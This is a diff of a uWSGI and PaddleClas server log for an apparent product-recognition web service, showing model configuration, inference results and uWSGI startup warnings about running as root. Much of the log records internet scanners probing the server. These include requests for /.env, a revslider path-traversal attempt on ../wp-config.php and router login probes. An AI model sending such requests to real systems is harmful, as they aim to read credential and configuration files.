/root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 16:11:03 INFO: return_k : 5 +2022-01-29 
16:11:03 INFO: score_thres : 0.5 +2022-01-29 16:11:03 INFO: RecPostProcess : None +2022-01-29 16:11:03 INFO: RecPreProcess : +2022-01-29 16:11:03 INFO: transform_ops : +2022-01-29 16:11:03 INFO: ResizeImage : +2022-01-29 16:11:03 INFO: size : 224 +2022-01-29 16:11:03 INFO: NormalizeImage : +2022-01-29 16:11:03 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:03 INFO: order : +2022-01-29 16:11:03 INFO: scale : 0.00392157 +2022-01-29 16:11:03 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:03 INFO: ToCHWImage : None +Inference: 374.25684928894043 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 6/11] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 03:58:17 2021] POST /reference_client/ => generated 98 bytes in 6349 msecs (HTTP/1.1 200) 5 headers in 157 bytes (14 switches on core 0) -[pid: 32765|app: 0|req: 7/12] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 04:00:16 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 5/13] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 04:00:17 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 183/198] 101.83.69.232 () {34 vars in 448 bytes} [Sat Jan 29 16:11:02 2022] POST /reference_client/ => generated 98 bytes in 2938 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) +[pid: 13128|app: 0|req: 12/199] 159.148.18.106 () {32 vars in 465 bytes} [Sat Jan 29 16:11:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:01:39 INFO: +2022-01-29 16:11:38 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -1876,75 +2260,1531 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:01:39 INFO: DetPostProcess : -2021-11-03 04:01:39 INFO: DetPreProcess : -2021-11-03 04:01:39 INFO: transform_ops : -2021-11-03 04:01:39 INFO: DetResize : -2021-11-03 04:01:39 INFO: interp : 2 -2021-11-03 04:01:39 INFO: keep_ratio : False -2021-11-03 04:01:39 INFO: target_size : [640, 640] -2021-11-03 04:01:39 INFO: DetNormalizeImage : -2021-11-03 04:01:39 INFO: is_scale : True -2021-11-03 04:01:39 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:01:39 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:01:39 INFO: DetPermute : -2021-11-03 04:01:39 INFO: Global : -2021-11-03 04:01:39 INFO: batch_size : 1 -2021-11-03 04:01:39 INFO: cpu_num_threads : 10 -2021-11-03 04:01:39 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:01:39 INFO: enable_benchmark : True -2021-11-03 04:01:39 INFO: enable_mkldnn : True -2021-11-03 04:01:39 INFO: enable_profile : False -2021-11-03 04:01:39 INFO: gpu_mem : 8000 -2021-11-03 04:01:39 INFO: image_shape : [3, 640, 640] -2021-11-03 04:01:39 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:01:39 INFO: ir_optim : True -2021-11-03 04:01:39 INFO: labe_list : ['foreground'] -2021-11-03 04:01:39 INFO: max_det_results : 5 -2021-11-03 04:01:39 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:01:39 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:01:39 INFO: threshold : 0.2 -2021-11-03 04:01:39 INFO: use_fp16 : False -2021-11-03 04:01:39 INFO: use_gpu : False -2021-11-03 04:01:39 INFO: use_tensorrt : False -2021-11-03 04:01:39 INFO: IndexProcess : -2021-11-03 04:01:39 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:01:39 INFO: return_k : 5 -2021-11-03 04:01:39 INFO: score_thres : 0.5 -2021-11-03 04:01:39 INFO: RecPostProcess : None -2021-11-03 04:01:39 INFO: RecPreProcess : -2021-11-03 04:01:39 INFO: transform_ops : -2021-11-03 04:01:39 INFO: ResizeImage : -2021-11-03 04:01:39 INFO: size : 224 -2021-11-03 04:01:39 INFO: NormalizeImage : -2021-11-03 04:01:39 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:01:39 INFO: order : -2021-11-03 04:01:39 INFO: scale : 0.00392157 -2021-11-03 04:01:39 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:01:39 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2216.1033153533936 ms per batch image +2022-01-29 16:11:38 INFO: DetPostProcess : +2022-01-29 16:11:38 INFO: DetPreProcess : +2022-01-29 16:11:38 INFO: transform_ops : +2022-01-29 16:11:38 INFO: DetResize : +2022-01-29 16:11:38 INFO: interp : 2 +2022-01-29 16:11:38 INFO: keep_ratio : False +2022-01-29 16:11:38 INFO: target_size : [640, 640] +2022-01-29 16:11:38 INFO: DetNormalizeImage : +2022-01-29 16:11:38 INFO: is_scale : True +2022-01-29 16:11:38 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:38 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:38 INFO: DetPermute : +2022-01-29 16:11:38 INFO: Global : +2022-01-29 16:11:38 INFO: batch_size : 1 +2022-01-29 16:11:38 INFO: cpu_num_threads : 1 +2022-01-29 16:11:38 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 16:11:38 INFO: enable_benchmark : True +2022-01-29 16:11:38 INFO: enable_mkldnn : True +2022-01-29 16:11:38 INFO: enable_profile : False +2022-01-29 16:11:38 INFO: gpu_mem : 8000 +2022-01-29 16:11:38 INFO: image_shape : [3, 640, 640] +2022-01-29 16:11:38 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 16:11:38 INFO: ir_optim : True +2022-01-29 16:11:38 INFO: labe_list : ['foreground'] +2022-01-29 16:11:38 INFO: max_det_results : 5 +2022-01-29 16:11:38 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 16:11:38 INFO: rec_nms_thresold : 0.05 +2022-01-29 16:11:38 INFO: 
threshold : 0.2 +2022-01-29 16:11:38 INFO: use_fp16 : False +2022-01-29 16:11:38 INFO: use_gpu : False +2022-01-29 16:11:38 INFO: use_tensorrt : False +2022-01-29 16:11:38 INFO: IndexProcess : +2022-01-29 16:11:38 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 16:11:38 INFO: return_k : 5 +2022-01-29 16:11:38 INFO: score_thres : 0.5 +2022-01-29 16:11:38 INFO: RecPostProcess : None +2022-01-29 16:11:38 INFO: RecPreProcess : +2022-01-29 16:11:38 INFO: transform_ops : +2022-01-29 16:11:38 INFO: ResizeImage : +2022-01-29 16:11:38 INFO: size : 224 +2022-01-29 16:11:38 INFO: NormalizeImage : +2022-01-29 16:11:38 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:38 INFO: order : +2022-01-29 16:11:38 INFO: scale : 0.00392157 +2022-01-29 16:11:38 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:38 INFO: ToCHWImage : None +Inference: 380.3141117095947 ms per batch image +[{'bbox': [7, 13, 640, 475], 'rec_docs': '江小白', 'rec_scores': 0.5033179}] +{'bbox': [7, 13, 640, 475], 'rec_docs': '江小白', 'rec_scores': 0.5033179} +234 +["{'bbox': [7, 13, 640, 475], 'rec_docs': '江小白', 'rec_scores': 0.5033179}\n"] +['江小白'] +['江小白', '20'] +[pid: 13129|app: 0|req: 184/200] 101.83.69.232 () {34 vars in 449 bytes} [Sat Jan 29 16:11:37 2022] POST /reference_client/ => generated 114 bytes in 3002 msecs (HTTP/1.1 200) 5 headers in 158 bytes (18 switches on core 0) +req +2022-01-29 16:12:07 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 16:12:07 INFO: DetPostProcess : +2022-01-29 16:12:07 INFO: DetPreProcess : +2022-01-29 16:12:07 INFO: transform_ops : +2022-01-29 16:12:07 INFO: DetResize : +2022-01-29 16:12:07 INFO: interp : 2 +2022-01-29 16:12:07 INFO: keep_ratio : False +2022-01-29 16:12:07 INFO: target_size : [640, 640] +2022-01-29 16:12:07 INFO: DetNormalizeImage : +2022-01-29 16:12:07 INFO: is_scale : True +2022-01-29 16:12:07 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:12:07 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:12:07 INFO: DetPermute : +2022-01-29 16:12:07 INFO: Global : +2022-01-29 16:12:07 INFO: batch_size : 1 +2022-01-29 16:12:07 INFO: cpu_num_threads : 1 +2022-01-29 16:12:07 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 16:12:07 INFO: enable_benchmark : True +2022-01-29 16:12:07 INFO: enable_mkldnn : True +2022-01-29 16:12:07 INFO: enable_profile : False +2022-01-29 16:12:07 INFO: gpu_mem : 8000 +2022-01-29 16:12:07 INFO: image_shape : [3, 640, 640] +2022-01-29 16:12:07 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 16:12:07 INFO: ir_optim : True +2022-01-29 16:12:07 INFO: labe_list : ['foreground'] +2022-01-29 16:12:07 INFO: max_det_results : 5 +2022-01-29 16:12:07 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 16:12:07 INFO: rec_nms_thresold : 0.05 +2022-01-29 16:12:07 INFO: threshold : 0.2 +2022-01-29 16:12:07 INFO: use_fp16 : False +2022-01-29 16:12:07 INFO: use_gpu : False +2022-01-29 16:12:07 INFO: use_tensorrt : False +2022-01-29 16:12:07 INFO: IndexProcess : +2022-01-29 16:12:07 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 16:12:07 INFO: return_k : 5 +2022-01-29 
16:12:07 INFO: score_thres : 0.5 +2022-01-29 16:12:07 INFO: RecPostProcess : None +2022-01-29 16:12:07 INFO: RecPreProcess : +2022-01-29 16:12:07 INFO: transform_ops : +2022-01-29 16:12:07 INFO: ResizeImage : +2022-01-29 16:12:07 INFO: size : 224 +2022-01-29 16:12:07 INFO: NormalizeImage : +2022-01-29 16:12:07 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:12:07 INFO: order : +2022-01-29 16:12:07 INFO: scale : 0.00392157 +2022-01-29 16:12:07 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:12:07 INFO: ToCHWImage : None +Inference: 385.2193355560303 ms per batch image +[{'bbox': [150, 50, 552, 479], 'rec_docs': '江小白', 'rec_scores': 0.7525106}] +{'bbox': [150, 50, 552, 479], 'rec_docs': '江小白', 'rec_scores': 0.7525106} +234 +["{'bbox': [150, 50, 552, 479], 'rec_docs': '江小白', 'rec_scores': 0.7525106}\n"] +['江小白'] +['江小白', '20'] +[pid: 13129|app: 0|req: 185/201] 101.83.69.232 () {34 vars in 448 bytes} [Sat Jan 29 16:12:06 2022] POST /reference_client/ => generated 114 bytes in 3115 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) +[pid: 13127|app: 0|req: 3/202] 101.133.135.162 () {22 vars in 236 bytes} [Sat Jan 29 16:15:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13127|app: 0|req: 4/203] 101.133.135.162 () {22 vars in 297 bytes} [Sat Jan 29 16:15:55 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 2/204] 101.133.135.162 () {22 vars in 240 bytes} [Sat Jan 29 16:16:05 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 3/205] 101.133.135.162 () {22 vars in 240 bytes} [Sat Jan 29 16:16:09 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 186/206] 101.133.135.162 () {40 vars in 485 bytes} [Sat Jan 
29 16:16:13 2022] OPTIONS sip:nm => generated 179 bytes in 2 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 187/207] 34.140.248.32 () {42 vars in 562 bytes} [Sat Jan 29 16:26:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 188/208] 45.83.66.221 () {42 vars in 575 bytes} [Sat Jan 29 17:09:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 189/209] 45.83.66.189 () {42 vars in 597 bytes} [Sat Jan 29 17:09:38 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 190/210] 128.199.160.152 () {36 vars in 529 bytes} [Sat Jan 29 18:04:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 191/211] 128.199.160.152 () {38 vars in 551 bytes} [Sat Jan 29 18:07:57 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 192/212] 23.251.102.74 () {34 vars in 487 bytes} [Sat Jan 29 18:36:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 193/213] 103.207.42.166 () {36 vars in 590 bytes} [Sat Jan 29 20:02:58 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 194/214] 103.207.42.166 () {40 vars in 697 bytes} [Sat Jan 29 20:03:10 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 195/215] 209.17.96.114 () {30 vars in 410 bytes} [Sat Jan 29 20:41:56 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 
196/216] 47.101.196.6 () {34 vars in 458 bytes} [Sat Jan 29 21:16:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 13/217] 167.248.133.118 () {28 vars in 312 bytes} [Sat Jan 29 21:20:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 197/218] 167.248.133.118 () {34 vars in 444 bytes} [Sat Jan 29 21:20:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 198/219] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 21:20:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 199/220] 109.237.103.9 () {36 vars in 523 bytes} [Sat Jan 29 22:11:35 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 200/221] 136.144.41.117 () {40 vars in 568 bytes} [Sat Jan 29 22:17:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 201/222] 109.237.103.123 () {36 vars in 525 bytes} [Sat Jan 29 22:32:24 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 202/223] 39.99.236.165 () {34 vars in 411 bytes} [Sat Jan 29 22:35:58 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 203/224] 39.99.236.165 () {32 vars in 409 bytes} [Sat Jan 29 22:35:58 2022] GET /text4041643495757 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 204/225] 39.99.236.165 () {32 vars in 395 bytes} [Sat Jan 29 22:35:58 2022] GET /evox/about => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 205/226] 39.99.236.165 () {28 vars in 307 bytes} [Sat Jan 29 22:35:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 206/227] 39.99.236.165 () {32 vars in 385 bytes} [Sat Jan 29 22:35:58 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 207/228] 39.99.236.165 () {36 vars in 463 bytes} [Sat Jan 29 22:36:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 208/229] 39.99.236.165 () {34 vars in 414 bytes} [Sat Jan 29 22:36:08 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 209/230] 164.90.142.228 () {40 vars in 658 bytes} [Sat Jan 29 23:06:13 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 210/231] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 00:02:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 211/232] 195.94.182.79 () {32 vars in 463 bytes} [Sun Jan 30 01:31:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 212/233] 47.102.154.221 () {34 vars in 441 bytes} [Sun Jan 30 01:38:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 213/234] 167.94.146.59 () {28 vars in 310 bytes} [Sun Jan 30 01:46:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 214/235] 167.94.146.59 () {34 vars in 442 bytes} [Sun Jan 30 01:46:21 2022] GET / => generated 
179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 215/236] 178.62.69.128 () {48 vars in 876 bytes} [Sun Jan 30 01:50:13 2022] POST /boaform/admin/formLogin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 216/237] 183.136.225.56 () {34 vars in 456 bytes} [Sun Jan 30 03:22:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 50429] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 217/238] 83.97.20.34 () {30 vars in 329 bytes} [Sun Jan 30 03:40:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 218/239] 20.124.2.234 () {42 vars in 899 bytes} [Sun Jan 30 04:01:06 2022] GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 219/240] 20.124.2.234 () {42 vars in 790 bytes} [Sun Jan 30 04:01:06 2022] GET /_profiler/phpinfo => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 220/241] 20.114.175.20 () {36 vars in 589 bytes} [Sun Jan 30 04:29:49 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 221/242] 20.114.175.20 () {40 vars in 696 bytes} [Sun Jan 30 04:29:49 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 222/243] 39.103.154.124 () {32 vars in 503 bytes} [Sun Jan 30 04:53:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 223/244] 143.198.136.88 () 
{32 vars in 365 bytes} [Sun Jan 30 05:18:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 224/245] 151.242.218.166 () {36 vars in 522 bytes} [Sun Jan 30 05:40:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 225/246] 83.97.20.34 () {26 vars in 287 bytes} [Sun Jan 30 06:08:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 226/247] 47.100.2.4 () {34 vars in 437 bytes} [Sun Jan 30 07:38:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 227/248] 192.241.206.75 () {34 vars in 394 bytes} [Sun Jan 30 08:00:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 14/249] 106.75.22.49 () {30 vars in 327 bytes} [Sun Jan 30 08:03:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 228/250] 39.99.254.87 () {24 vars in 259 bytes} [Sun Jan 30 08:24:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 229/251] 39.99.254.87 () {34 vars in 636 bytes} [Sun Jan 30 08:24:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13127|app: 0|req: 5/252] 39.99.254.87 () {26 vars in 313 bytes} [Sun Jan 30 08:24:47 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 4/253] 39.99.254.87 () {26 vars in 311 bytes} [Sun Jan 30 08:24:47 2022] GET /robots.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: 
client_addr: 123.160.221.18 client_port: 9344] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 230/254] 123.160.221.18 () {28 vars in 313 bytes} [Sun Jan 30 08:45:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 231/255] 111.7.100.17 () {42 vars in 739 bytes} [Sun Jan 30 08:45:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 232/256] 111.7.100.16 () {42 vars in 760 bytes} [Sun Jan 30 08:45:44 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Sun Jan 30 16:56:26 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: /root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. 
You can enable it with --enable-threads *** +Python main interpreter initialized at 0x561407fca830 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x561407fca830 pid: 19137 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 19137) +spawned uWSGI worker 1 (pid: 19139, cores: 1) +spawned uWSGI worker 2 (pid: 19140, cores: 1) +spawned uWSGI worker 3 (pid: 19141, cores: 1) +spawned uWSGI worker 4 (pid: 19142, cores: 1) +spawned uWSGI worker 5 (pid: 19143, cores: 1) +spawned uWSGI worker 6 (pid: 19144, cores: 1) +spawned uWSGI worker 7 (pid: 19145, cores: 1) +spawned uWSGI worker 8 (pid: 19146, cores: 1) +spawned uWSGI worker 9 (pid: 19147, cores: 1) +spawned uWSGI worker 10 (pid: 19148, cores: 1) +spawned uWSGI http 1 (pid: 19149) +req +2022-01-30 08:56:49 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
